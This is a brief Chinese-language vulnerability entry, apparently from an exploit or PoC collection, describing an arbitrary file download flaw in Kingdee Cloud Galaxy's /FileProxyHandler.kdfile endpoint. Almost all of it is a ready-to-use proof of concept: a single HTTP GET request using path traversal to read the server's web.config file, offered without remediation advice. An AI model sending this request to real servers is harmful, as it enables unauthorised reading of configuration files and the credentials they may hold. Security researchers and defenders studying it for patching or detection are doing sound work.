金蝶云星空 /FileProxyHandler.kdfile 路径存在任意文件下载

日期: 2023-10-23 | 影响软件: 金蝶云星空 | POC: 已公开

漏洞描述

金蝶云星空 /FileProxyHandler.kdfile 任意文件读取,攻击者可以获取服务器文件信息

PoC代码

GET /FileProxyHandler.kdfile?Area=0&F=..%2F..%2Fweb.config&Ope=SDL&Step=100000 HTTP/1.1

相关漏洞推荐